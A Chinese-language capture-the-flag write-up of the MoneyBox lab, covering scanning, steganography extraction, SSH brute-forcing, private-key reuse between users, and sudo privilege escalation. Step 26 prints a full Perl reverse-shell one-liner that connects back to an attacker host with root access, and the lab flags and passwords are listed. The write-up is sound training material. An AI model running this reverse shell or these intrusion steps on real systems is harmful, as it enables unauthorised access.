MoneyBox靶场实战

一、主机信息

Kali:192.168.21.50

MoneyBox:192.168.21.93

二、实战步骤

1.首先使用fscan对已知ip进行端口扫描

扫描结果,开放了21,22,80端口

2.存在web网站,进行访问

http://192.168.10.151/

3.使用御剑进行目录扫描,发现存在http://192.168.21.93/blogs/

4.访问该目录,提示存在另一个敏感目录

5.访问该敏感目录,出现一个密码为3xtr4ctd4t4

6.在fscan扫描结果中发现开放了ftp的anonymous账号,尝试进行连接,找到trytofind.jpg图片文件

将图片下载到本地

7.显示图片的相关信息,其中有data.txt文件,密码为步骤5中的3xtr4ctd4t4

steghide info /home/kali/Desktop/trytofind.jpg

8.将该文件提取出来,密码为步骤5中的3xtr4ctd4t4

steghide extract -sf /home/kali/Desktop/trytofind.jpg

9.查看data.txt文件内容,提示存在renu用户

10.开放了22端口,尝试进行ssh连接,但需要密码

尝试进行暴力破解,得到密码为987654321

11.使用密码进行登录,列表中存在user1.txt

12.查看user1.txt内容,得到第一个flag

F14g:0ku74tbd3777y4

13.查看/etc/passwd,发现renu在home目录下

14.进入home目录中,发现存在另一个用户lily

15.进入lily目录,发现存在user2.txt文件

16查看文件内容,发现第二个flag

F14g:tr5827r5wu6nklao

17.查看renu目录下所有文件目录,存在.ssh目录,进入该目录查看存在公钥id_rsa.pub和私钥id_rsa

分别查看公私钥内容

18.查看lily目录下所有文件目录,发现lily目录下也存在公钥文件authorized_keys

查看该公钥文件

19.对比renu目录下公钥文件ia_rsa.pub和lily目录下公钥文件authorized_keys,发现其内容相同,尝试是否可以用renu的私钥登录lily

20.下载renu的私钥到本地

21.使用下载的私钥尝试登录lily用户,提示权限错误

ssh -i /home/kali/Desktop/id_rsa lily@192.168.21.93

22.查看原本私钥文件的权限

23.将下载的私钥文件修改为相应的权限

24.再次尝试登录

ssh -i /home/kali/Desktop/id_rsa lily@192.168.21.93

25.查看其他目录均提示权限不够,使用sudo -l列出当前用户被允许使用sudo以提升权限执行的命令

26.利用perl反弹shell,使用sudo将root权限反弹到kali上

sudo perl -e 'use Socket;$i="192.168.21.17";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

kali进行监听,接收到反弹shell,且为root权限

27.进入root目录下,发现存在.root.txt文件

28.查看该文件内容,得到第三个flag

H4ckth3p14n3t

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值